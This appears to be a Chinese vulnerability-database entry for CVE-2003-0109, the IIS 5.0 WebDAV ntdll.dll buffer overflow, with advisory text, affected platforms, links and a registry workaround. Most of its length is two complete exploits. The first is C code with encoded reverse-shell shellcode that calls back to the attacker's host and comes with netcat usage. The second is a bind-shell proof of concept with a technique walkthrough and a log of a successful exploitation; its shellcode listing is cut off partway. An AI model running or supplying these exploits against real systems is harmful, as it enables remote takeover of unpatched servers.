CVE-2003-0109
CVSS7.5
发布时间 :2003-03-31 00:00:00
修订时间 :2016-10-17 22:29:38
NMCOEPS    

[原文]Buffer overflow in ntdll.dll on Microsoft Windows NT 4.0, Windows NT 4.0 Terminal Server Edition, Windows 2000, and Windows XP allows remote attackers to execute arbitrary code, as demonstrated via a WebDAV request to IIS 5.0.


[CNNVD]Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞(MS03-007)(CNNVD-200303-079)

        
        Microsoft IIS 5.0(Internet Infomation Server 5)是Microsoft Windows 2000自带的一个网络信息服务器,其中包含HTTP服务功能。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。但是作为普通的HTTP服务器,这个功能不是必需的。
        IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞对WebDAV进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        IIS 5.0的WebDAV使用了ntdll.dll中的一些函数,而这些函数存在一个缓冲区溢出漏洞。通过对WebDAV的畸形请求可以触发这个溢出。成功利用这个漏洞可以获得LocalSystem权限。这意味着,入侵者可以获得主机的完全控制能力。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/o:microsoft:windows_2000:::advanced_server
cpe:/o:microsoft:windows_2000::sp3:professionalMicrosoft Windows 2000 Professional SP3
cpe:/o:microsoft:windows_2000_terminal_services::sp2
cpe:/o:microsoft:windows_2000::sp1:professionalMicrosoft Windows 2000 Professional SP1
cpe:/o:microsoft:windows_2000::sp2:professionalMicrosoft Windows 2000 Professional SP2
cpe:/o:microsoft:windows_2000:::datacenter_server
cpe:/o:microsoft:windows_2000::sp3:advanced_serverMicrosoft Windows 2000 Advanced Server SP3
cpe:/o:microsoft:windows_2000::sp2:advanced_serverMicrosoft Windows 2000 Advanced Server SP2
cpe:/o:microsoft:windows_2000::sp1:advanced_serverMicrosoft Windows 2000 Advanced Server SP1
cpe:/o:microsoft:windows_2000::sp1:serverMicrosoft Windows 2000 Server SP1
cpe:/o:microsoft:windows_2000::sp3:serverMicrosoft Windows 2000 Server SP3
cpe:/o:microsoft:windows_2000:::server
cpe:/o:microsoft:windows_2000_terminal_services::sp3
cpe:/o:microsoft:windows_2000::sp3:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP3
cpe:/o:microsoft:windows_2000_terminal_services::sp1
cpe:/o:microsoft:windows_2000::sp1:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP1
cpe:/o:microsoft:windows_2000::sp2:datacenter_serverMicrosoft Windows 2000 Datacenter Server SP2
cpe:/o:microsoft:windows_2000:::professional
cpe:/o:microsoft:windows_2000_terminal_services
cpe:/o:microsoft:windows_2000::sp2:serverMicrosoft Windows 2000 Server SP2

- OVAL (用于检测的技术细节)

oval:org.mitre.oval:def:109Windows ntdll.dll Buffer Overflow
*OVAL详细的描述了检测该漏洞的方法,你可以从相关的OVAL定义中找到更多检测该漏洞的技术细节。

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0109
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0109
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200303-079
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=104826476427372&w=2
(UNKNOWN)  BUGTRAQ  20030321 New attack vectors and a vulnerability dissection of MS03-007
http://marc.info/?l=bugtraq&m=104861839130254&w=2
(UNKNOWN)  BUGTRAQ  20030325 IIS 5.0 WebDAV -Proof of concept-. Fully documented.
http://marc.info/?l=bugtraq&m=104869293619064&w=2
(UNKNOWN)  BUGTRAQ  20030326 WebDAV exploit: using wide character decoder scheme
http://marc.info/?l=bugtraq&m=104887148323552&w=2
(UNKNOWN)  BUGTRAQ  20030328 Fate Research Labs Presents: Analysis of the NTDLL.DLL Exploit
http://marc.info/?l=bugtraq&m=105768156625699&w=2
(UNKNOWN)  BUGTRAQ  20030708 WDAV exploit without netcat and with pretty magic number
http://marc.info/?l=ntbugtraq&m=104826785731151&w=2
(UNKNOWN)  NTBUGTRAQ  20030321 New attack vectors and a vulnerability dissection of MS03-007
http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
(UNKNOWN)  CONFIRM  http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en
http://support.microsoft.com/default.aspx?scid=kb;%5BLN%5D;Q815021
(UNKNOWN)  MSKB  Q815021
http://www.cert.org/advisories/CA-2003-09.html
(VENDOR_ADVISORY)  CERT  CA-2003-09
http://www.iss.net/issEn/delivery/xforce/alertdetail.jsp?oid=22029
(VENDOR_ADVISORY)  ISS  20030317 Microsoft IIS WebDAV Remote Compromise Vulnerability
http://www.iss.net/security_center/static/11533.php
(VENDOR_ADVISORY)  XF  http-webdav-long-request(11533)
http://www.kb.cert.org/vuls/id/117394
(UNKNOWN)  CERT-VN  VU#117394
http://www.microsoft.com/technet/security/bulletin/ms03-007.asp
(VENDOR_ADVISORY)  MS  MS03-007
http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
(UNKNOWN)  MISC  http://www.nextgenss.com/papers/ms03-007-ntdll.pdf
http://www.securityfocus.com/bid/7116
(VENDOR_ADVISORY)  BID  7116

- 漏洞信息

Microsoft Windows 2000 WebDAV远程缓冲区溢出漏洞(MS03-007)
高危 边界条件错误
2003-03-31 00:00:00 2005-10-20 00:00:00
远程  
        
        Microsoft IIS 5.0(Internet Infomation Server 5)是Microsoft Windows 2000自带的一个网络信息服务器,其中包含HTTP服务功能。IIS5 默认提供了对WebDAV的支持,通过WebDAV可以通过HTTP向用户提供远程文件存储的服务。但是作为普通的HTTP服务器,这个功能不是必需的。
        IIS 5.0包含的WebDAV组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏洞对WebDAV进行缓冲区溢出攻击,可能以WEB进程权限在系统上执行任意指令。
        IIS 5.0的WebDAV使用了ntdll.dll中的一些函数,而这些函数存在一个缓冲区溢出漏洞。通过对WebDAV的畸形请求可以触发这个溢出。成功利用这个漏洞可以获得LocalSystem权限。这意味着,入侵者可以获得主机的完全控制能力。
        

- 公告与补丁

        临时解决方法:
        如果您不能立刻安装补丁或者升级,CNNVD建议您采取以下措施以降低威胁:
        * 使用微软提供的IIS Lockdown工具可能可以防止该漏洞被利用。
        * WebDAV在IIS 5.0 WEB服务器上的实现Httpext.dll完成,默认安装,但是简单更改Httpext.dll不能修正此漏洞,因为WINDOWS 2000的WFP功能会防止系统重要文件破坏或删除。要完全关闭WebDAV包括的PUT和DELETE请求,可对注册表进行如下更改:
        1、启动注册表编辑器(Regedt32.exe)。
        2、搜索注册表中的如下键:
         HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W3SVC\Parameters
        
        3、点击'编辑'菜单,点增加值,然后增加如下注册表键值:
        Value name: DisableWebDAV
        Data type: DWORD
        Value data: 1
        厂商补丁:
        Microsoft
        ---------
        Microsoft已经为此发布了一个安全公告(MS03-007)以及相应补丁:
        MS03-007:Unchecked Buffer In Windows Component Could Cause Web Server Compromise(815021)
        链接:
        http://www.microsoft.com/technet/security/bulletin/MS03-007.asp

        补丁下载:
        Microsoft Windows 2000:
        
        http://microsoft.com/downloads/details.aspx?FamilyId=C9A38D45-5145-4844-B62E-C69D32AC929B&displaylang=en

- 漏洞信息 (1)

MS Windows WebDAV (ntdll.dll) Remote Exploit (EDBID:1)
windows remote
2003-03-23 Verified
80 kralor
N/A [点击下载]
/*******************************************************************/
/* [Crpt] ntdll.dll exploit trough WebDAV by kralor [Crpt] */
/* --------------------------------------------------------------- */
/* this is the exploit for ntdll.dll through WebDAV. */
/* run a netcat ex: nc -L -vv -p 666 */
/* wb server.com your_ip 666 0 */
/* the shellcode is a reverse remote shell */
/* you need to pad a bit.. the best way I think is launching */
/* the exploit with pad = 0 and after that, the server will be */
/* down for a couple of seconds, now retry with pad at 1 */
/* and so on..pad 2.. pad 3.. if you haven't the shell after */
/* something like pad at 10 I think you better to restart from */
/* pad at 0. On my local IIS the pad was at 1 (0x00110011) but */
/* on all the others servers it was at 2,3,4, etc..sometimes */
/* you can have the force with you, and get the shell in 1 try */
/* sometimes you need to pad more than 10 times ;) */
/* the shellcode was coded by myself, it is SEH + ScanMem to */
/* find the famous offsets (GetProcAddress).. */
/* */
/*******************************************************************/


#include <winsock.h>
#include <windows.h>
#include <stdio.h>

#pragma comment (lib,"ws2_32")

char shellc0de[] =
"\x55\x8b\xec\x33\xc9\x53\x56\x57\x8d\x7d\xa2\xb1\x25\xb8\xcc\xcc"
"\xcc\xcc\xf3\xab\xeb\x09\xeb\x0c\x58\x5b\x59\x5a\x5c\x5d\xc3\xe8"
"\xf2\xff\xff\xff\x5b\x80\xc3\x10\x33\xc9\x66\xb9\xb5\x01\x80\x33"
"\x95\x43\xe2\xfa\x66\x83\xeb\x67\xfc\x8b\xcb\x8b\xf3\x66\x83\xc6"
"\x46\xad\x56\x40\x74\x16\x55\xe8\x13\x00\x00\x00\x8b\x64\x24\x08"
"\x64\x8f\x05\x00\x00\x00\x00\x58\x5d\x5e\xeb\xe5\x58\xeb\xb9\x64"
"\xff\x35\x00\x00\x00\x00\x64\x89\x25\x00\x00\x00\x00\x48\x66\x81"
"\x38\x4d\x5a\x75\xdb\x64\x8f\x05\x00\x00\x00\x00\x5d\x5e\x8b\xe8"
"\x03\x40\x3c\x8b\x78\x78\x03\xfd\x8b\x77\x20\x03\xf5\x33\xd2\x8b"
"\x06\x03\xc5\x81\x38\x47\x65\x74\x50\x75\x25\x81\x78\x04\x72\x6f"
"\x63\x41\x75\x1c\x81\x78\x08\x64\x64\x72\x65\x75\x13\x8b\x47\x24"
"\x03\xc5\x0f\xb7\x1c\x50\x8b\x47\x1c\x03\xc5\x8b\x1c\x98\x03\xdd"
"\x83\xc6\x04\x42\x3b\x57\x18\x75\xc6\x8b\xf1\x56\x55\xff\xd3\x83"
"\xc6\x0f\x89\x44\x24\x20\x56\x55\xff\xd3\x8b\xec\x81\xec\x94\x00"
"\x00\x00\x83\xc6\x0d\x56\xff\xd0\x89\x85\x7c\xff\xff\xff\x89\x9d"
"\x78\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x33\xc9\x51\x51\x51"
"\x51\x41\x51\x41\x51\xff\xd0\x89\x85\x94\x00\x00\x00\x8b\x85\x7c"
"\xff\xff\xff\x83\xc6\x0b\x56\x50\xff\xd3\x83\xc6\x08\x6a\x10\x56"
"\x8b\x8d\x94\x00\x00\x00\x51\xff\xd0\x33\xdb\xc7\x45\x8c\x44\x00"
"\x00\x00\x89\x5d\x90\x89\x5d\x94\x89\x5d\x98\x89\x5d\x9c\x89\x5d"
"\xa0\x89\x5d\xa4\x89\x5d\xa8\xc7\x45\xb8\x01\x01\x00\x00\x89\x5d"
"\xbc\x89\x5d\xc0\x8b\x9d\x94\x00\x00\x00\x89\x5d\xc4\x89\x5d\xc8"
"\x89\x5d\xcc\x8d\x45\xd0\x50\x8d\x4d\x8c\x51\x6a\x00\x6a\x00\x6a"
"\x00\x6a\x01\x6a\x00\x6a\x00\x83\xc6\x09\x56\x6a\x00\x8b\x45\x20"
"\xff\xd0"
"CreateProcessA\x00LoadLibraryA\x00ws2_32.dll\x00WSASocketA\x00"
"connect\x00\x02\x00\x02\x9A\xC0\xA8\x01\x01\x00"
"cmd" // don't change anything..
"\x00\x00\xe7\x77" // offsets of kernel32.dll for some win ver..
"\x00\x00\xe8\x77"
"\x00\x00\xf0\x77"
"\x00\x00\xe4\x77"
"\x00\x88\x3e\x04" // win2k3
"\x00\x00\xf7\xbf" // win9x =P
"\xff\xff\xff\xff";

int test_host(char *host)
{
char search[100]="";
int sock;
struct hostent *heh;
struct sockaddr_in hmm;
char buf[100] ="";

if(strlen(host)>60) {
printf("error: victim host too long.\r\n");
return 1;
}

if ((heh = gethostbyname(host))==0){
printf("error: can't resolve '%s'",host);
return 1;
}

sprintf(search,"SEARCH / HTTP/1.1\r\nHost: %s\r\n\r\n",host);
hmm.sin_port = htons(80);
hmm.sin_family = AF_INET;
hmm.sin_addr = *((struct in_addr *)heh->h_addr);

if ((sock = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return 1;
}

printf("Checking WebDav on '%s' ... ",host);

if ((connect(sock, (struct sockaddr *) &hmm, sizeof(hmm))) == -1){
printf("CONNECTING_ERROR\r\n");
return 1;
}
send(sock,search,strlen(search),0);
recv(sock,buf,sizeof(buf),0);
if(buf[9]=='4'&&buf[10]=='1'&&buf[11]=='1')
return 0;
printf("NOT FOUND\r\n");
return 1;
}

void help(char *program)
{
printf("syntax: %s <victim_host> <your_host> <your_port> [padding]\r\n",program);
return;
}

void banner(void)
{
printf("\r\n\t [Crpt] ntdll.dll exploit trough WebDAV by kralor
[Crpt]\r\n");
printf("\t\twww.coromputer.net && undernet #coromputer\r\n\r\n");
return;
}

void main(int argc, char *argv[])
{
WSADATA wsaData;
unsigned short port=0;
char *port_to_shell="", *ip1="", data[50]="";
unsigned int i,j;
unsigned int ip = 0 ;
int s, PAD=0x10;
struct hostent *he;
struct sockaddr_in crpt;
char buffer[65536] ="";
char request[80000]; // huuuh, what a mess! :)
char content[] =
"<?xml version=\"1.0\"?>\r\n"
"<g:searchrequest xmlns:g=\"DAV:\">\r\n"
"<g:sql>\r\n"
"Select \"DAV:displayname\" from scope()\r\n"
"</g:sql>\r\n"
"</g:searchrequest>\r\n";

banner();
if((argc<4)||(argc>5)) {
help(argv[0]);
return;
}

if(WSAStartup(0x0101,&wsaData)!=0) {
printf("error starting winsock..");
return;
}

if(test_host(argv[1]))
return;

if(argc==5)
PAD+=atoi(argv[4]);

printf("FOUND\r\nexploiting ntdll.dll through WebDav [ret: 0x00%02x00%02x]\r\n",PAD,PAD);

ip = inet_addr(argv[2]); ip1 = (char*)&ip;

shellc0de[448]=ip1[0]; shellc0de[449]=ip1[1]; shellc0de[450]=ip1[2];
shellc0de[451]=ip1[3];

port = htons(atoi(argv[3]));
port_to_shell = (char *) &port;
shellc0de[446]=port_to_shell[0];
shellc0de[447]=port_to_shell[1];

// we xor the shellcode [xored by 0x95 to avoid bad chars]
__asm {
lea eax, shellc0de
add eax, 0x34
xor ecx, ecx
mov cx, 0x1b0
wah:
xor byte ptr[eax], 0x95
inc eax
loop wah
}

if ((he = gethostbyname(argv[1]))==0){
printf("error: can't resolve '%s'",argv[1]);
return;
}

crpt.sin_port = htons(80);
crpt.sin_family = AF_INET;
crpt.sin_addr = *((struct in_addr *)he->h_addr);

if ((s = socket(AF_INET, SOCK_STREAM, 0)) == -1){
printf("error: can't create socket");
return;
}

printf("Connecting... ");

if ((connect(s, (struct sockaddr *) &crpt, sizeof(crpt))) == -1){
printf("ERROR\r\n");
return;
}
// No Operation.
for(i=0;i<sizeof(buffer);buffer[i]=(char)0x90,i++);
// fill the buffer with the shellcode
for(i=64000,j=0;i<sizeof(buffer)&&j<sizeof(shellc0de)-1;buffer[i]=shellc0de[j],i++,j++);
// well..it is not necessary..
for(i=0;i<2500;buffer[i]=PAD,i++);

/* we can simply put our ret in this 2 offsets.. */
//buffer[2086]=PAD;
//buffer[2085]=PAD;

buffer[sizeof(buffer)]=0x00;
memset(request,0,sizeof(request));
memset(data,0,sizeof(data));
sprintf(request,"SEARCH /%s HTTP/1.1\r\nHost: %s\r\nContent-type: text/xml\r\nContent-Length: ",buffer,argv[1]);
sprintf(request,"%s%d\r\n\r\n",request,strlen(content));
printf("CONNECTED\r\nSending evil request... ");
send(s,request,strlen(request),0);
send(s,content,strlen(content),0);
printf("SENT\r\n");
recv(s,data,sizeof(data),0);
if(data[0]!=0x00) {
printf("Server seems to be patched.\r\n");
printf("data: %s\r\n",data);
} else
printf("Now if you are lucky you will get a shell.\r\n");
closesocket(s);
return;
}

// milw0rm.com [2003-03-23]
		

- 漏洞信息 (2)

MS Windows WebDAV Remote PoC Exploit (EDBID:2)
windows remote
2003-03-24 Verified
80 RoMaNSoFt
N/A [点击下载]
/*************************************/
/* IIS 5.0 WebDAV -Proof of concept- */
/* [ Bug: CAN-2003-0109 ] */
/* By Roman Medina-Heigl Hernandez */
/* aka RoMaNSoFt <roman@rs-labs.com> */
/* Madrid, 23.Mar.2003 */
/* ================================= */
/* Public release. Version 1. */
/* --------------------------------- */
/*************************************/
/* ====================================================================
* --[ READ ME ]
* 
* This exploit is mainly a proof of concept of the recently discovered ntdll.dll bug (which may be
* exploited in many other programs, not necessarily IIS). Practical exploitation is not as easy as
* expected due to difficult RET guessing mixed with possible IIS crashes (which makes RET brute
* forcing a tedious work). The shellcode included here will bind a cmd.exe shell to a given port
* at the victim machine so it could be problematic if that machine is protected behind a firewall.
* For all these reasons, the scope of this code is limited and mainly intended for educational
* purposes. I am not responsible of possible damages created by the use of this exploit code.
* 
* The program sends a HTTP request like this:
* 
* SEARCH /[nop] [ret][ret][ret] ... [ret] [nop][nop][nop][nop][nop] ... [nop] [jmpcode] HTTP/1.1
* {HTTP headers here}
* {HTTP body with webDAV content}
* 0x01 [shellcode]
* 
* IIS converts the first ascii string ([nop]...[jmpcode]) to Unicode using UTF-16 encoding (for
* instance, 0x41 becomes 0x41 0x00, i.e. an extra 0x00 byte is added) and it is the resultant
* Unicode string the one producing the overflow. So at first glance, we cannot include code here
* (more on this later) because it would get corrupted by 0x00 (and other) inserted bytes. Not at
* least using the common method. Another problem that we will have to live with is our RET value
* being padded with null bytes, so if we use 0xabcd in our string, the real RET value (i.e. the
* one EIP will be overwritten with) would be 0x00ab00cd. This is an important restriction.
* 
* We have two alternatives:
*
* 1) The easy one: find any occurrences of our ascii string (i.e. before it gets converted to
* the Unicode form) in process memory. Problem: normally we should find it by debugging the
* vulnerable application and then hardcode the found address (which will be the RET address)
* in our exploit code. This RET address is variable, even for the same version of OS and app
* (I mean, different instances of the same application in the same machine could make the
* guessed RET address invalid at different moments). Now add the restriction of RET value
* padded with null-bytes. Anyway, the main advantage of this method is that we will not have
* to deal with 0x00-padded shellcode.
* 
* 2) The not so-easy one: you could insert an encoded shellcode in such a way that when the app
* expands the ascii string (with the encoded shellcode) to Unicode, a valid shellcode is
* automagically placed into memory. Please, refer to Chris Anley's "venetian exploit" paper
* to read more about this. Dave Aitel also has a good paper about this technique and indeed
* he released code written in Python to encode shellcode (I'm wondering if he will release a
* working tool for that purpose, since the actual code was released as part of a commercial
* product, so it cannot be run without buying the whole product, despite the module itself
* being free!). Problem: it is not so easy as the first method ;-) Advantage: when the over-
* flow happens, some registers may point to our Unicoded string (where our Unicoded-shellcode
* lives in), so we don't need to guess the address where shellcode will be placed and the
* chance of a successful exploitation is greatly improved. For instance, in this case, when
* IIS is overflowed, ECX register points to the Unicode string. The idea is then fill in
* RET value with the fixed address of code like "call %ecx". This code may be contained in
* any previosly-loaded library, for example).
* 
* Well, guess it... yes... I chose the easy method :-) Perhaps I will rewrite the exploit
* using method 2, but I cannot promise that.
* 
* Let's see another problem of the method 1 (which I have used). Not all Unicode conversions
* result in a 0x00 byte being added. This is true for ascii characters lower or equal to 0x7f
* (except for some few special characters, I'm not sure). But our shellcode will have bytes
* greater than 0x7f value. So we don't know the exact length of the Unicoded-string containing
* our shellcode (some ascii chars will expand to more than 2 bytes, I think). As a result,
* sometimes the exploit may not work, because no exact length is matched. For instance, if you
* carry out experiments on this issue, you could see that IIS crashes (overflow occurs) when
* entering a query like SEARCH /AAAA...AAA HTTP/1.1, with 65535 A's. Same happens with 65536.
* But with different values seems NOT to work. So matching the exact length is important here!
* 
* What I have done, it is to include a little "jumpcode" instead of the shellcode itself. The
* jumpcode is placed into the "critical" place and has a fixed length, so our string has always
* a fixed length, too. The "variable" part (the shellcode) is placed at the end of the HTTP
* request (so you can insert your own shellcode and remove the one I'm using here, with no apparent
* problem). To be precise, the end of the request will be: 0x01 [shellcode]. The 0x01 byte marks
* the beginning of the shellcode and it is used by the jumpcode to find the address where shell-
* code begins and jump into it. It is not possible to hardcode a relative jump, because HTTP
* headers have a variable length (think about the "Host:" header and you will understand what
* I'm saying). Well, really, the exploit could have calculated the relative jump itself (other
* problems arise like null-bytes possibly contained in the offset field) but I have prefered to
* use the 0x01 trick. It's my exploit, it's my choice :-)
* 
* After launching the exploit, several things may happen:
* - the exploit is successful. You can connect to the bound port of victim machine and get a
* shell. Great. Remember that when you issue an "exit" command in the shell prompt, the pro-
* cess will be terminated. This implies that IIS could die.
* - exploit returns a "server not vulnerable" response. Really, the server may not be vulnerable
* or perhaps the SEARCH method used by the exploit is not permitted (the bug can still be
* exploited via GET, probably) or webDAV is disabled at all.
* - exploit did not get success (which is not strange, since it is not easy to guess RET value)
* but the server is vulnerable. IIS will probably not survive: a "net start w3svc" could be
* needed in the victim machine, in order to restart the WWW service.
* 
* The following log shows a correct exploitation:
* 
* roman@goliat:~/iis5webdav> gcc -o rs_iis rs_iis.c
* roman@goliat:~/iis5webdav> ./rs_iis roman 
* [*] Resolving hostname ...
* [*] Attacking port 80 at roman (EIP = 0x00480004)...
* [*] Now open another console/shell and try to connect (telnet) to victim port 31337...
* 
* roman@goliat:~/iis5webdav> telnet roman 31337
* Trying 192.168.0.247...
* Connected to roman.
* Escape character is '^]'.
* Microsoft Windows 2000 [Versi¢n 5.00.2195]
* (C) Copyright 1985-2000 Microsoft Corp.
* 
* C:\WINNT\system32>
* 
* 
* I am not going to show logs for the faulty cases. I'm pretty sure you will see them very
* soon :-) But yes, the exploit works, perhaps a little fine-tunning may be required, though.
* So please, do NOT contact me telling that the exploit doesn't work or things like that. It
* worked for me and it will work for you, if you're not a script-kiddie. Try to attach to the
* IIS process (inetinfo.exe) with the help of a debugger (OllyDbg is my favourite) on the
* victim machine and then launch the exploit against it. Debugger will break when the first
* exception is produced. Now place a breakpoint in 0x00ab00cd (being 0xabcd the not-unicoded
* RET value) and resume execution until you reach that point. Finally, it's time to search
* the memory looking for our shellcode. It is nearly impossible (very low chance) that our
* shellcode is found at any 0x00**00**-form address (needed to bypass the RET restriction
* imposed by Unicode conversion) but no problem: you have a lot of NOPs before the shellcode
* where you could point to. If EIP is overwritten with the address of such a NOP, program flow
* will finish reaching our shellcode. Note also that among the two bytes of RET that we have some
* kind of control, the more important is the first one, i.e. the more significant. In other
* words, interesting RET values to try are: 0x0104, 0x0204, 0x0304, 0x0404, 0x0504, ...,
* and so on, till 0xff04. As you may have noticed, the last byte (0x04) is never changed because
* its weight is minimal (256 between aprox. 65000 NOP's is not appreciable).
* 
* 
* My best wishes,
* --Roman
* 
* ===================================== --[ EOT ]-- ====================
*/


#include <stdio.h>
#include <errno.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netdb.h>
#include <netinet/in.h>

// Change to fit your need
#define RET 0x4804 // EIP = 0x00480004
#define LOADLIBRARYA 0x0100107c
#define GETPROCADDRESS 0x01001034

// Don't change this
#define PORT_OFFSET 1052
#define LOADL_OFFSET 798
#define GETPROC_OFFSET 815
#define NOP 0x90
#define MAXBUF 100000


/*
* LoadLibraryA IT Address := 0100107C
* GetProcAddress IT Address := 01001034
*/

unsigned char shellcode[] = // Deepzone shellcode
"\x68\x5e\x56\xc3\x90\x54\x59\xff\xd1\x58\x33\xc9\xb1\x1c"
"\x90\x90\x90\x90\x03\xf1\x56\x5f\x33\xc9\x66\xb9\x95\x04"
"\x90\x90\x90\xac\x34\x99\xaa\xe2\xfa\x71\x99\x99\x99\x99"
"\xc4\x18\x74\x40\xb8\xd9\x99\x14\x2c\x6b\xbd\xd9\x99\x14"
"\x24\x63\xbd\xd9\x99\xf3\x9e\x09\x09\x09\x09\xc0\x71\x4b"
"\x9b\x99\x99\x14\x2c\xb3\xbc\xd9\x99\x14\x24\xaa\xbc\xd9"
"\x99\xf3\x93\x09\x09\x09\x09\xc0\x71\x23\x9b\x99\x99\xf3"
"\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x7c\xbc\xd9\x99"
"\xcf\x14\x2c\x70\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9\x99"
"\xf3\x99\x14\x2c\x40\xbc\xd9\x99\xcf\x14\x2c\x74\xbc\xd9"
"\x99\xcf\x14\x2c\x68\xbc\xd9\x99\xcf\x66\x0c\xaa\xbc\xd9"
"\x99\x5e\x1c\x6c\xbc\xd9\x99\xdd\x99\x99\x99\x14\x2c\x6c"
"\xbc\xd9\x99\xcf\x66\x0c\xae\xbc\xd9\x99\x14\x2c\xb4\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\xa8\xbf"
"\xd9\x99\x34\xc9\x66\x0c\xca\xbc\xd9\x99\x14\x2c\x68\xbc"
"\xd9\x99\x14\x24\xb4\xbf\xd9\x99\x3c\x14\x2c\x7c\xbc\xd9"
"\x99\x34\x14\x24\xa8\xbf\xd9\x99\x32\x14\x24\xac\xbf\xd9"
"\x99\x32\x5e\x1c\xbc\xbf\xd9\x99\x99\x99\x99\x99\x5e\x1c"
"\xb8\xbf\xd9\x99\x98\x98\x99\x99\x14\x2c\xa0\xbf\xd9\x99"
"\xcf\x14\x2c\x6c\xbc\xd9\x99\xcf\xf3\x99\xf3\x99\xf3\x89"
"\xf3\x98\xf3\x99\xf3\x99\x14\x2c\xd0\xbf\xd9\x99\xcf\xf3"
"\x99\x66\x0c\xa2\xbc\xd9\x99\xf1\x99\xb9\x99\x99\x09\xf1"
"\x99\x9b\x99\x99\x66\x0c\xda\xbc\xd9\x99\x10\x1c\xc8\xbf"
"\xd9\x99\xaa\x59\xc9\xd9\xc9\xd9\xc9\x66\x0c\x63\xbd\xd9"
"\x99\xc9\xc2\xf3\x89\x14\x2c\x50\xbc\xd9\x99\xcf\xca\x66"
"\x0c\x67\xbd\xd9\x99\xf3\x9a\xca\x66\x0c\x9b\xbc\xd9\x99"
"\x14\x2c\xcc\xbf\xd9\x99\xcf\x14\x2c\x50\xbc\xd9\x99\xcf"
"\xca\x66\x0c\x9f\xbc\xd9\x99\x14\x24\xc0\xbf\xd9\x99\x32"
"\xaa\x59\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14"
"\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3"
"\xa9\x66\x0c\xd6\xbc\xd9\x99\x72\xd4\x09\x09\x09\xaa\x59"
"\xc9\x14\x24\xfc\xbf\xd9\x99\xce\xc9\xc9\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x1a\x24\xfc\xbf\xd9\x99\x9b\x96\x1b"
"\x8e\x98\x99\x99\x18\x24\xfc\xbf\xd9\x99\x98\xb9\x99\x99"
"\xeb\x97\x09\x09\x09\x09\x5e\x1c\xfc\xbf\xd9\x99\x99\xb9"
"\x99\x99\xf3\x99\x12\x1c\xfc\xbf\xd9\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xc9\x12\x1c\xc8\xbf\xd9\x99\xc9\x14\x2c\x70"
"\xbc\xd9\x99\x34\xc9\x66\x0c\xde\xbc\xd9\x99\xf3\xc9\x66"
"\x0c\xd6\xbc\xd9\x99\x12\x1c\xfc\xbf\xd9\x99\xf3\x99\xc9"
"\x14\x2c\xc8\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99"
"\x34\xc9\x66\x0c\x93\xbc\xd9\x99\xf3\x99\x14\x24\xfc\xbf"
"\xd9\x99\xce\xf3\x99\xf3\x99\xf3\x99\x14\x2c\x70\xbc\xd9"
"\x99\x34\xc9\x66\x0c\xa6\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6"
"\xbc\xd9\x99\xaa\x50\xa0\x14\xfc\xbf\xd9\x99\x96\x1e\xfe"
"\x66\x66\x66\xf3\x99\xf1\x99\xb9\x99\x99\x09\x14\x2c\xc8"
"\xbf\xd9\x99\x34\xc9\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66"
"\x0c\x97\xbc\xd9\x99\x10\x1c\xf8\xbf\xd9\x99\xf3\x99\x14"
"\x24\xfc\xbf\xd9\x99\xce\xc9\x14\x2c\xc8\xbf\xd9\x99\x34"
"\xc9\x14\x2c\x74\xbc\xd9\x99\x34\xc9\x66\x0c\xd2\xbc\xd9"
"\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\xf3\x99\x12\x1c\xf8"
"\xbf\xd9\x99\x14\x24\xfc\xbf\xd9\x99\xce\xc9\x12\x1c\xc8"
"\xbf\xd9\x99\xc9\x14\x2c\x70\xbc\xd9\x99\x34\xc9\x66\x0c"
"\xde\xbc\xd9\x99\xf3\xc9\x66\x0c\xd6\xbc\xd9\x99\x70\x20"
"\x67\x66\x66\x14\x2c\xc0\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\x14\x2c\xc4\xbf\xd9\x99\x34\xc9\x66\x0c\x8b"
"\xbc\xd9\x99\xf3\x99\x66\x0c\xce\xbc\xd9\x99\xc8\xcf\xf1"
"\xe5\x89\x99\x98\x09\xc3\x66\x8b\xc9\xc2\xc0\xce\xc7\xc8"
"\xcf\xca\xf1\xad\x89\x99\x98\x09\xc3\x66\x8b\xc9\x35\x1d"
"\x59\xec\x62\xc1\x32\xc0\x7b\x70\x5a\xce\xca\xd6\xda\xd2"
